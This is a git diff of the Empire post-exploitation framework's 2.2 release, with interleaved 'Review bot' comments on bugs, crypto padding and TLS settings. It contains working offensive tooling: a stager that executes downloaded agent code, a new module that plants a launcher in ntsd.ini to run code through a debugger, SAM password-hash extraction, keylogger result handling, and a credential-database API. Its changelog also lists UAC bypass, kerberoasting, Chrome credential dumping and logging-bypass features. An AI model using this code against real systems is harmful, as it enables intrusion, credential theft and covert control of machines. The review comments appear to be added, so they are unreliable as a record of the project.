diff --git a/changelog b/changelog index c59d199..be9d61f 100644 --- a/changelog +++ b/changelog 
@@ -1,25 +1,26 @@ -Running +10/12/2017 -------- -- Update crontab to work hourly #667 -- Update keylogger to log to disk on server side by @clr2of8 -- Fix macro launcher #681 -- Fixes vbscript string literal quoting. #702 -- Add option to host a stager payload in the http listener @424f424f -- Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f -- Hide true host name when using domain fronting #730 @clr2of8 -- Fixed custom proxy config in launcher code #728 @dirkjanm -- generate_upload function added to Stagers #722 @hightopfade -- Aes kerberoast #725 @elitest -- DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher -- Improved ScriptBlock logging bypasses #740 @cobbr_io -- Slack Integration - Notification for new Agents #737 @dchrastil -- Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers -- Fix Eternal Blue Issue #656 -- Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663 -- Fix Macro syntax error per @utkusen issue #664 -- Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr -- Fix creds manual add parsing with whitespace in password -- Fix validate length parameter attribute for Invoke-PSInject.ps1d +- Version 2.2 Master Release + - Update crontab to work hourly #667 + - Update keylogger to log to disk on server side by @clr2of8 + - Fix macro launcher #681 + - Fixes vbscript string literal quoting. 
#702
+ - Add option to host a stager payload in the http listener @424f424f
+ - Add @enigma0x3 Token Manipulation script as a BypassUAC module @424f424f
+ - Hide true host name when using domain fronting #730 @clr2of8
+ - Fixed custom proxy config in launcher code #728 @dirkjanm
+ - generate_upload function added to Stagers #722 @hightopfade
+ - Aes kerberoast #725 @elitest
+ - DBX Improvements (SOCKS, Hide window via WindowHandler) #721 @IljaSchumacher
+ - Improved ScriptBlock logging bypasses #740 @cobbr_io
+ - Slack Integration - Notification for new Agents #737 @dchrastil
+ - Improve Get-ChromeDump #734 @ThePirateWhoSmellsOfSunFlowers
+ - Fix Eternal Blue Issue #656
+ - Merge Invoke-Kerberoast: Print hashes only. Formatting with a text editor is no longer required. #663
+ - Fix Macro syntax error per @utkusen issue #664
+ - Fix Better powershell install, obfuscation bug fixes, fixed vbs/macro launchers #686 @cobbr
+ - Fix creds manual add parsing with whitespace in password
+ - Fix validate length parameter attribute for Invoke-PSInject.ps1d
 8/28/2017
 --------
diff --git a/data/agent/agent.py b/data/agent/agent.py
index f34d675..f9acf25 100644
--- a/data/agent/agent.py
+++ b/data/agent/agent.py
@@ -137,6 +137,9 @@ def build_response_packet(taskingID, packetData, resultID=0):
 if packetData:
 packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8',errors='ignore'))
+ if len(packetData) % 4:
+ packetData += '=' * (4 - len(packetData) % 4)
+
 length = struct.pack('=L',len(packetData))
 return packetType + totalPacket + packetNum + resultID + length + packetData
 else:
diff --git a/data/agent/stagers/dropbox.py b/data/agent/stagers/dropbox.py
index cfb8831..b840eeb 100644
--- a/data/agent/stagers/dropbox.py
+++ b/data/agent/stagers/dropbox.py
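Review bot: The new `if len(packetData) % 4:` branch in build_response_packet is dead code: `base64.b64encode` already returns output whose length is a multiple of 4, so the `'='` padding is never appended, and on Python 3 (where b64encode returns bytes) `packetData += '=' * ...` would raise TypeError if it ever ran. If the intent is to tolerate un-padded base64 arriving from the other side, that belongs next to the decoder that receives it, not after an encoder that always pads. Either drop the two added lines or replace them with a comment such as `# b64encode output is always 4-byte aligned; no manual '=' padding needed`. The enclosing function starts outside the hunk.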
@@ -247,11 +247,8 @@ except Exception:
 return c
 def append_PKCS7_padding(data):
- if (len(data) % 16) == 0:
- return data
- else:
- pad = 16 - (len(data) % 16)
- return data + to_bufferable(chr(pad) * pad)
+ pad = 16 - (len(data) % 16)
+ return data + to_bufferable(chr(pad) * pad)
 def strip_PKCS7_padding(data):
@@ -259,11 +256,7 @@ def strip_PKCS7_padding(data):
 raise ValueError("invalid length")
 pad = _get_byte(data[-1])
-
- if pad <= 16:
- return data[:-pad]
- else:
- return data
+ return data[:-pad]
 class AES(object):
 '''Encapsulates the AES block cipher.
@@ -522,10 +515,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation):
 def CBCenc(aesObj, plaintext, base64=False):
- # break the blocks in 16 byte chunks, padding the last chunk if necessary
- blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
- blocks[-1] = append_PKCS7_padding(blocks[-1])
+ # First we padd the plaintext
+ paddedPlaintext = append_PKCS7_padding(plaintext)
+
+ # The we break the padded plaintext in 16 byte chunks
+ blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)]
+ # Finally we encypt each block
 ciphertext = ""
 for block in blocks:
 ciphertext += aesObj.encrypt(block)
@@ -535,15 +531,16 @@ def CBCenc(aesObj, plaintext, base64=False):
 def CBCdec(aesObj, ciphertext, base64=False):
- # break the blocks in 16 byte chunks, padding the last chunk if necessary
+ # First we break the cyphertext in 16 byte chunks
 blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
- plaintext = ""
+ # Then we decrypt each block
+ paddedPlaintext = ""
+ for block in blocks:
+ paddedPlaintext += aesObj.decrypt(block)
- for x in xrange(0, len(blocks)-1):
- plaintext += aesObj.decrypt(blocks[x])
-
- plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
+ # Finally we strip the padding
+ plaintext = strip_PKCS7_padding(paddedPlaintext)
 return plaintext
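Review bot: `strip_PKCS7_padding` now trusts the final byte unconditionally: a trailing byte of 0 makes `data[:-pad]` evaluate to `data[:0]`, i.e. an empty result, and a value above 16 (or above `len(data)`) strips more than one block, and neither case raises. The removed `if pad <= 16` guard was itself wrong (it returned the data unstripped), but the replacement should reject instead of silently accepting: `if pad < 1 or pad > 16: raise ValueError("invalid padding")` before `return data[:-pad]`, and ideally also check that every one of the last `pad` bytes equals `pad`. The stager tail mentions an HMAC check before decryption, which would bound who can reach this code with chosen bytes, but the unpadding routine should not depend on that. The identical rewrite appears in data/agent/stagers/http.py further down, and the new CBCenc/CBCdec comments carry typos (`padd`, `The we`, `encypt`, `cyphertext`).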
@@ -892,4 +889,4 @@ response = post_message("https://api.dropboxapi.com/2/files/delete",data=datastr # step 6 -> server sends HMAC(AES) agent = aes_decrypt_and_verify(key, raw) -exec(agent) \ No newline at end of file +exec(agent) diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py index 0a06c5a..7871fdf 100644 --- a/data/agent/stagers/http.py +++ b/data/agent/stagers/http.py @@ -18,6 +18,8 @@ import socket import subprocess from binascii import hexlify + + LANGUAGE = { 'NONE' : 0, 'POWERSHELL' : 1, @@ -249,13 +251,9 @@ except Exception: def _get_byte(c): return c - def append_PKCS7_padding(data): - if (len(data) % 16) == 0: - return data - else: - pad = 16 - (len(data) % 16) - return data + to_bufferable(chr(pad) * pad) + pad = 16 - (len(data) % 16) + return data + to_bufferable(chr(pad) * pad) def strip_PKCS7_padding(data): @@ -263,11 +261,7 @@ def strip_PKCS7_padding(data): raise ValueError("invalid length") pad = _get_byte(data[-1]) - - if pad <= 16: - return data[:-pad] - else: - return data + return data[:-pad] class AES(object): @@ -335,10 +329,10 @@ class AES(object): tt = tk[KC - 1] tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^ - (self.S[(tt >> 8) & 0xFF] << 16) ^ - (self.S[ tt & 0xFF] << 8) ^ - self.S[(tt >> 24) & 0xFF] ^ - (self.rcon[rconpointer] << 24)) + (self.S[(tt >> 8) & 0xFF] << 16) ^ + (self.S[ tt & 0xFF] << 8) ^ + self.S[(tt >> 24) & 0xFF] ^ + (self.rcon[rconpointer] << 24)) rconpointer += 1 if KC != 8: @@ -352,9 +346,9 @@ class AES(object): tt = tk[KC // 2 - 1] tk[KC // 2] ^= (self.S[ tt & 0xFF] ^ - (self.S[(tt >> 8) & 0xFF] << 8) ^ - (self.S[(tt >> 16) & 0xFF] << 16) ^ - (self.S[(tt >> 24) & 0xFF] << 24)) + (self.S[(tt >> 8) & 0xFF] << 8) ^ + (self.S[(tt >> 16) & 0xFF] << 16) ^ + (self.S[(tt >> 24) & 0xFF] << 24)) for i in xrange(KC // 2 + 1, KC): tk[i] ^= tk[i - 1] 
@@ -372,9 +366,9 @@ class AES(object): for j in xrange(0, 4): tt = self._Kd[r][j] self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^ - self.U2[(tt >> 16) & 0xFF] ^ - self.U3[(tt >> 8) & 0xFF] ^ - self.U4[ tt & 0xFF]) + self.U2[(tt >> 16) & 0xFF] ^ + self.U3[(tt >> 8) & 0xFF] ^ + self.U4[ tt & 0xFF]) def encrypt(self, plaintext): 'Encrypt a block of plain text using the AES block cipher.' @@ -528,10 +522,13 @@ class AESModeOfOperationCBC(AESBlockModeOfOperation): def CBCenc(aesObj, plaintext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary - blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)] - blocks[-1] = append_PKCS7_padding(blocks[-1]) + # First we padd the plaintext + paddedPlaintext = append_PKCS7_padding(plaintext) + + # The we break the padded plaintext in 16 byte chunks + blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)] + # Finally we encypt each block ciphertext = "" for block in blocks: ciphertext += aesObj.encrypt(block) @@ -541,15 +538,16 @@ def CBCenc(aesObj, plaintext, base64=False): def CBCdec(aesObj, ciphertext, base64=False): - # break the blocks in 16 byte chunks, padding the last chunk if necessary + # First we break the cyphertext in 16 byte chunks blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)] - plaintext = "" + # Then we decrypt each block + paddedPlaintext = "" + for block in blocks: + paddedPlaintext += aesObj.decrypt(block) - for x in xrange(0, len(blocks)-1): - plaintext += aesObj.decrypt(blocks[x]) - - plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1])) + # Finally we strip the padding + plaintext = strip_PKCS7_padding(paddedPlaintext) return plaintext diff --git a/data/module_source/code_execution/Invoke-Ntsd.ps1 b/data/module_source/code_execution/Invoke-Ntsd.ps1 new file mode 100644 index 0000000..988347b --- /dev/null +++ b/data/module_source/code_execution/Invoke-Ntsd.ps1 
@@ -0,0 +1,8 @@ + +Function Write-Ini([string]$path, [string]$launcher) +{ + # -Encoding ASCII is needed otherwise it will write in unicode + # this will cause ntsd to not execute our code + ".shell" | Out-File -Encoding ASCII "$path\ntsd.ini" + "$launcher" | Out-File -Encoding ASCII "$path\ntsd.ini" -Append +} diff --git a/data/module_source/code_execution/ntsd_x64.exe b/data/module_source/code_execution/ntsd_x64.exe new file mode 100644 index 0000000..e726683 Binary files /dev/null and b/data/module_source/code_execution/ntsd_x64.exe differ diff --git a/data/module_source/code_execution/ntsd_x86.exe b/data/module_source/code_execution/ntsd_x86.exe new file mode 100644 index 0000000..321772f Binary files /dev/null and b/data/module_source/code_execution/ntsd_x86.exe differ diff --git a/data/module_source/code_execution/ntsdexts_x64.dll b/data/module_source/code_execution/ntsdexts_x64.dll new file mode 100644 index 0000000..0432623 Binary files /dev/null and b/data/module_source/code_execution/ntsdexts_x64.dll differ diff --git a/data/module_source/code_execution/ntsdexts_x86.dll b/data/module_source/code_execution/ntsdexts_x86.dll new file mode 100644 index 0000000..b54891d Binary files /dev/null and b/data/module_source/code_execution/ntsdexts_x86.dll differ diff --git a/data/module_source/credentials/Invoke-PowerDump.ps1 b/data/module_source/credentials/Invoke-PowerDump.ps1 index dec03c3..47d9dd7 100644 --- a/data/module_source/credentials/Invoke-PowerDump.ps1 +++ b/data/module_source/credentials/Invoke-PowerDump.ps1 
@@ -411,14 +411,30 @@ namespace PowerDump function Get-UserHashes($u, [byte[]]$hbootkey) { [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null; - if ($u.HashOffset + 0x28 -lt $u.V.Length) + + # check if hashes exist (if byte memory equals to 20, then we've got a hash) + $LM_exists = $false; + $NT_exists = $false; + # LM header check + if ($u.V[0xa0..0xa3] -eq 20) + { + $LM_exists = $true; + } + # NT header check + elseif ($u.V[0xac..0xaf] -eq 20) + { + $NT_exists = $true; + } + + if ($LM_exists -eq $true) { $lm_hash_offset = $u.HashOffset + 4; $nt_hash_offset = $u.HashOffset + 8 + 0x10; $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)]; $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; } - elseif ($u.HashOffset + 0x14 -lt $u.V.Length) + + elseif ($NT_exists -eq $true) { $nt_hash_offset = $u.HashOffset + 8; $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; @@ -494,4 +510,4 @@ namespace PowerDump { Write-Error "Administrator or System privileges necessary." } -} \ No newline at end of file +} diff --git a/empire b/empire index 0d7f49a..32cafca 100755 --- a/empire +++ b/empire @@ -10,8 +10,7 @@ from Crypto.Random import random import ssl # Empire imports -from lib.common import empire -from lib.common import helpers +from lib.common import empire, helpers global serverExitCommand serverExitCommand = 'restart' @@ -134,6 +133,7 @@ def get_permanent_token(conn): # GET http://localhost:1337/api/reporting/msg/Z return all logged events matching message Z, wildcards accepted # # GET http://localhost:1337/api/creds return stored credentials +# POST http://localhost:1337/api/creds add creds to the database # # GET http://localhost:1337/api/admin/login retrieve the API token given the correct username and password # GET http://localhost:1337/api/admin/permanenttoken retrieve the permanent API token, generating/storing one if it doesn't already exist 
@@ -1039,6 +1039,67 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None, return jsonify({'creds' : creds}) + @app.route('/api/creds', methods=['POST']) + def add_creds(): + """ + Adds credentials to the database + """ + if not request.json: + return make_response(jsonify({'error':'request body must be valid JSON'}), 400) + + if not 'credentials' in request.json: + return make_response(jsonify({'error':'JSON body must include key "credentials"'}), 400) + + creds = request.json['credentials'] + + if not type(creds) == list: + return make_response(jsonify({'error':'credentials must be provided as a list'}), 400) + + required_fields = ["credtype", "domain", "username", "password", "host"] + optional_fields = ["OS", "notes", "sid"] + + for cred in creds: + # ensure every credential given to us has all the required fields + if not all (k in cred for k in required_fields): + return make_response(jsonify({'error':'invalid credential %s' %(cred)}), 400) + + # ensure the type is either "hash" or "plaintext" + if not (cred['credtype'] == u'hash' or cred['credtype'] == u'plaintext'): + return make_response(jsonify({'error':'invalid credential type in %s, must be "hash" or "plaintext"' %(cred)}), 400) + + # other than that... just assume everything is valid + + # this would be way faster if batched but will work for now + for cred in creds: + # get the optional stuff, if it's there + try: + os = cred['os'] + except KeyError: + os = '' + + try: + sid = cred['sid'] + except KeyError: + sid = '' + + try: + notes = cred['notes'] + except KeyError: + notes = '' + + main.credentials.add_credential( + cred['credtype'], + cred['domain'], + cred['username'], + cred['password'], + cred['host'], + os, + sid, + notes + ) + + return jsonify({'success': '%s credentials added' % len(creds)}) + @app.route('/api/reporting', methods=['GET']) def get_reporting(): 
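Review bot: `add_creds` declares `optional_fields = ["OS", "notes", "sid"]` but then reads `cred['os']`, so a client sending the advertised key `OS` silently loses the value, and `optional_fields` is otherwise unused. The per-entry validation also never checks that `cred` is an object: for a string entry `all(k in cred for k in required_fields)` becomes a substring test and `cred['credtype']` then raises TypeError, turning a malformed body into a 500 where the surrounding checks return 400. The local variable `os` additionally shadows the `os` module inside the handler. Change the list entry to `"os"`, add an `isinstance(cred, dict)` guard, and read the optional keys with `dict.get`:
```python
for cred in creds:
    # every entry must be a JSON object carrying all required fields;
    # a non-dict entry would otherwise raise on cred['credtype'] below
    if not isinstance(cred, dict) or not all(k in cred for k in required_fields):
        return make_response(jsonify({'error':'invalid credential %s' %(cred)}), 400)
    # … unchanged: credtype must be "hash" or "plaintext" …

for cred in creds:
    # optional fields default to ''; key names are exactly those in optional_fields
    cred_os = cred.get('os', '')
    sid = cred.get('sid', '')
    notes = cred.get('notes', '')
    # … unchanged: main.credentials.add_credential(...) call, passing cred_os where os was …
```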
@@ -1161,7 +1222,7 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
 if not os.path.exists('./data/empire-chain.pem'):
- print "[!] Error: cannot find certificate ./data/empire.pem"
+ print "[!] Error: cannot find certificate ./data/empire-chain.pem"
 sys.exit()
@@ -1227,7 +1288,17 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
 # wrap the Flask connection in SSL and start it
 certPath = os.path.abspath("./data/")
- context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
+
+ # support any version of tls
+ pyversion = sys.version_info
+ if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
+ proto = ssl.PROTOCOL_TLS
+ elif pyversion[0] >= 3:
+ proto = ssl.PROTOCOL_TLS
+ else:
+ proto = ssl.PROTOCOL_SSLv23
+
+ context = ssl.SSLContext(proto)
 context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
 app.run(host='0.0.0.0', port=int(port), ssl_context=context, threaded=True)
@@ -1239,6 +1310,7 @@ if __name__ == '__main__':
 generalGroup = parser.add_argument_group('General Options')
 generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).')
 generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.')
+ generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.')
 cliGroup = parser.add_argument_group('CLI Payload Options')
 cliGroup.add_argument('-l', '--listener', nargs='?', const="list", help='Display listener options. Displays all listeners if nothing is specified.')
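Review bot: Replacing `ssl.PROTOCOL_TLSv1_2` with `PROTOCOL_TLS`/`PROTOCOL_SSLv23` does more than "support any version of tls": those constants let the linked OpenSSL negotiate anything it still allows, including TLS 1.0/1.1 (and SSLv3 on older builds), so the API server now accepts weaker versions than before. Pin a floor right after `context = ssl.SSLContext(proto)`: `context.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | getattr(ssl, 'OP_NO_TLSv1_1', 0)` (the getattr covers the pre-2.7.9 interpreters the SSLv23 branch targets). The version switch can also misfire: `ssl.PROTOCOL_TLS` is documented as new in Python 3.6, so the `pyversion[0] >= 3` branch raises AttributeError on 3.0–3.5; `proto = getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)` replaces the whole if/elif/else and picks the right constant on every interpreter. start_restful_api begins outside the hunk.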
@@ -1267,11 +1339,11 @@ if __name__ == '__main__':
 # start an Empire instance and RESTful API
 main = empire.MainMenu(args=args)
 def thread_api(empireMenu):
- while serverExitCommand == 'restart':
- try:
- start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport)
- except SystemExit as e:
- pass
+
+ try:
+ start_restful_api(empireMenu=empireMenu, suppress=False, username=args.username, password=args.password, port=args.restport)
+ except SystemExit as e:
+ pass
 thread = helpers.KThread(target=thread_api, args=(main,))
 thread.daemon = True
@@ -1282,11 +1354,11 @@ if __name__ == '__main__':
 elif args.headless:
 # start an Empire instance and RESTful API and suppress output
 main = empire.MainMenu(args=args)
- while serverExitCommand == 'restart':
- try:
- start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport)
- except SystemExit as e:
- pass
+
+ try:
+ start_restful_api(empireMenu=main, suppress=True, username=args.username, password=args.password, port=args.restport)
+ except SystemExit as e:
+ pass
 else:
 # normal execution
diff --git a/lib/common/agents.py b/lib/common/agents.py
index 2f9542f..e047629 100644
--- a/lib/common/agents.py
+++ b/lib/common/agents.py
@@ -1343,6 +1343,20 @@ class Agents:
 if autorun and autorun[0] != '' and autorun[1] != '':
 self.add_agent_task_db(sessionID, autorun[0], autorun[1])
+ if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0:
+ autorunCmds = ["interact %s" % sessionID]
+ autorunCmds.extend(self.mainMenu.autoRuns[language.lower()])
+ autorunCmds.extend(["lastautoruncmd"])
+ self.mainMenu.resourceQueue.extend(autorunCmds)
+ try:
+ #this will cause the cmdloop() to start processing the autoruns
+ self.mainMenu.do_agents("kickit")
+ except Exception as e:
+ if e.message == "endautorun":
+ pass
+ else:
+ raise e
+
 return "STAGE2: %s" % (sessionID)
 else:
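Review bot: The autorun block in `Agents` unwinds the menu it kicks off with `self.mainMenu.do_agents("kickit")` by catching a generic `Exception` and comparing `e.message == "endautorun"` (the exception is raised in `SubMenu.postcmd`, further down this diff); `e.message` is Python-2-only, the string compare is fragile, and the `raise e` in the else branch re-raises with a fresh traceback. A dedicated class beside the existing Nav* exceptions, `class EndAutorun(Exception): pass`, caught with `except EndAutorun: pass`, makes the intent explicit, and everything else should be re-raised with a bare `raise`. If this runs on the thread that handles the staging request (it sits next to the `STAGE2` return, which suggests so), driving the interactive `cmd.Cmd` loop from here also holds up that check-in until the autorun commands finish — worth a comment at minimum. The enclosing method starts outside the hunk.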
@@ -1399,7 +1413,6 @@ class Agents: TODO: does this need self.lock? """ - if sessionID not in self.agents: dispatcher.send("[!] handle_agent_request(): sessionID %s not present" % (sessionID), sender='Agents') return None @@ -1417,6 +1430,7 @@ class Agents: # build tasking packets for everything we have for tasking in taskings: task_name, task_data, res_id = tasking + all_task_packets += packets.build_task_packet(task_name, task_data, res_id) # get the session key for the agent @@ -1495,6 +1509,7 @@ class Agents: """ agentSessionID = sessionID + keyLogTaskID = None # see if we were passed a name instead of an ID nameid = self.get_agent_id_db(sessionID) @@ -1519,6 +1534,10 @@ class Agents: pk = (pk + 1) % 65536 cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data)) else: + try: + keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] + except Exception as e: + pass cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID]) finally: 
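Review bot: The keylogger lookup in the results update uses a double-quoted SQL literal, `data LIKE "function Get-Keystrokes%"`; SQLite treats double quotes as identifiers and only falls back to a string literal when no such column exists, so this should be single-quoted. It also takes `fetchone()[0]` over every matching tasking for the agent rather than the task being updated, so with more than one keylogger tasking in the table only the first id ever equals `taskID`, and the bare `except Exception: pass` hides both the no-row TypeError and any real database error. Restrict the query to the current task and test for a row explicitly: `row = cur.execute("SELECT id FROM taskings WHERE agent=? AND id=? AND data LIKE 'function Get-Keystrokes%'", [sessionID, taskID]).fetchone()` followed by `if row: keyLogTaskID = row[0]`, which needs no try/except at all. The enclosing method starts and ends outside the hunk.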
@@ -1703,9 +1722,20 @@ class Agents: elif responseName == "TASK_CMD_JOB": + #check if this is the powershell keylogging task, if so, write output to file instead of screen + if keyLogTaskID and keyLogTaskID == taskID: + safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) + savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID) + if not os.path.abspath(savePath).startswith(safePath): + dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') + return + with open(savePath,"a+") as f: + new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") + f.write(new_results) + else: + # dynamic script output -> non-blocking + self.update_agent_results_db(sessionID, data) - # dynamic script output -> non-blocking - self.update_agent_results_db(sessionID, data) # update the agent log self.save_agent_log(sessionID, data) diff --git a/lib/common/empire.py b/lib/common/empire.py index e0a356e..36fa3f7 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -95,12 +95,14 @@ class MainMenu(cmd.Cmd): self.stagers = stagers.Stagers(self, args=args) self.modules = modules.Modules(self, args=args) self.listeners = listeners.Listeners(self, args=args) + self.resourceQueue = [] + #A hashtable of autruns based on agent language + self.autoRuns = {} + self.handle_args() dispatcher.send('[*] Empire starting up...', sender="Empire") - - # print the loading menu messages.loading() @@ -139,6 +141,9 @@ class MainMenu(cmd.Cmd): """ Handle any passed arguments. """ + if self.args.resource: + resourceFile = self.args.resource[0] + self.do_resource(resourceFile) if self.args.listener or self.args.stager: # if we're displaying listeners/stagers or generating a stager 
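Review bot: In the moved keylogger branch the warning line reads `self.sessionID`, but this method belongs to `Agents` and every other line of the hunk uses the `sessionID` parameter, so an agent whose `savePath` fails the prefix check would hit an AttributeError instead of the intended log line; it should be `dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (sessionID), sender='Agents')`. The prefix check compares against `os.path.abspath("%sdownloads/" ...)`, which drops the trailing separator, so `startswith(safePath + os.sep)` is the tighter form. `open(savePath, "a+")` also assumes `downloads/<sessionID>/` already exists; if that directory is only created by the file-download handler, a keylogger result arriving first raises IOError here — confirm against the code that creates it. The enclosing method starts outside the hunk.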
@@ -232,11 +237,6 @@ class MainMenu(cmd.Cmd): print helpers.color("[!] Please run database_setup.py") sys.exit() - - # def preloop(self): - # traceback.print_stack() - - def cmdloop(self): """ The main cmdloop logic that handles navigation to other menus. @@ -274,6 +274,9 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n" print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" + if len(self.resourceQueue) > 0: + self.cmdqueue.append(self.resourceQueue.pop(0)) + cmd.Cmd.cmdloop(self) @@ -380,10 +383,43 @@ class MainMenu(cmd.Cmd): # CMD methods ################################################### + def postcmd(self, stop, line): + if len(self.resourceQueue) > 0: + nextcmd = self.resourceQueue.pop(0) + self.cmdqueue.append(nextcmd) + def default(self, line): "Default handler." pass + def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." + self.resourceQueue.extend(self.buildQueue(arg)) + + def buildQueue(self, resourceFile, autoRun=False): + cmds = [] + if os.path.isfile(resourceFile): + with open(resourceFile, 'r') as f: + lines = [] + lines.extend(f.read().splitlines()) + else: + raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile) + for lineFull in lines: + line = lineFull.strip() + #ignore lines that start with the comment symbol (#) + if line.startswith("#"): + continue + #read in another resource file + elif line.startswith("resource "): + rf = line.split(' ')[1] + cmds.extend(self.buildQueue(rf, autoRun)) + #add noprompt option to execute without user confirmation + elif autoRun and line == "execute": + cmds.append(line + " noprompt") + else: + cmds.append(line) + + return cmds def do_exit(self, line): "Exit Empire" @@ -430,7 +466,6 @@ class MainMenu(cmd.Cmd): stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") - except Exception as e: raise e 
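Review bot: `MainMenu.postcmd` never returns `stop`, so `cmd.Cmd.cmdloop` always receives None and no `do_*` handler can end the loop by returning True anymore; add `return stop` as its last line. `SubMenu.postcmd` in the next hunk has the same shape (it returns True only for `back`) and should also end with `return stop`. Separately, `buildQueue` recurses on `resource ` lines with no cycle guard, so a resource file that includes itself, directly or via another file, recurses until RecursionError; carrying a set of already-loaded paths through the recursion, or capping the depth, avoids that. Its `line.split(' ')[1]` also truncates paths containing spaces — `line.split(' ', 1)[1].strip()` keeps the rest of the line.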
@@ -706,7 +741,6 @@ class MainMenu(cmd.Cmd): name = line.strip() sessionID = self.agents.get_agent_id_db(name) - if sessionID and sessionID != '' and sessionID in self.agents.agents: AgentMenu(self, sessionID) else: @@ -889,26 +923,59 @@ class MainMenu(cmd.Cmd): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in options if s.startswith(mline)] - -class AgentsMenu(cmd.Cmd): - """ - The main class used by Empire to drive the 'agents' menu. - """ +class SubMenu(cmd.Cmd): + def __init__(self, mainMenu): cmd.Cmd.__init__(self) - self.mainMenu = mainMenu - self.doc_header = 'Commands' + def cmdloop(self): + if len(self.mainMenu.resourceQueue) > 0: + self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) + cmd.Cmd.cmdloop(self) - # set the prompt text - self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' + def emptyline(self): + pass - messages.display_agents(self.mainMenu.agents.get_agents_db()) - # def preloop(self): - # traceback.print_stack() + def postcmd(self, stop, line): + if line == "back": + return True + if len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + if nextcmd == "lastautoruncmd": + raise Exception("endautorun") + self.cmdqueue.append(nextcmd) + + + def do_back(self, line): + "Go back a menu." + return True + + def do_listeners(self, line): + "Jump to the listeners menu." + raise NavListeners() + + def do_agents(self, line): + "Jump to the agents menu." + raise NavAgents() + + def do_main(self, line): + "Go back to the main menu." + raise NavMain() + + def do_resource(self, arg): + "Read and execute a list of Empire commands from a file." + self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg)) + + def do_exit(self, line): + "Exit Empire." + raise KeyboardInterrupt + + def do_creds(self, line): + "Display/return credentials from the database." + self.mainMenu.do_creds(line) # print a nicely formatted help menu # stolen/adapted from recon-ng 
@@ -921,29 +988,63 @@ class AgentsMenu(cmd.Cmd): self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) self.stdout.write("\n") + # def preloop(self): + # traceback.print_stack() - def emptyline(self): - pass +class AgentsMenu(SubMenu): + """ + The main class used by Empire to drive the 'agents' menu. + """ + def __init__(self, mainMenu): + SubMenu.__init__(self, mainMenu) + self.doc_header = 'Commands' + + # set the prompt text + self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > ' + + messages.display_agents(self.mainMenu.agents.get_agents_db()) def do_back(self, line): "Go back to the main menu." raise NavMain() - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt + def do_autorun(self, line): + "Read and execute a list of Empire commands from a file and execute on each new agent \"autorun \" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with 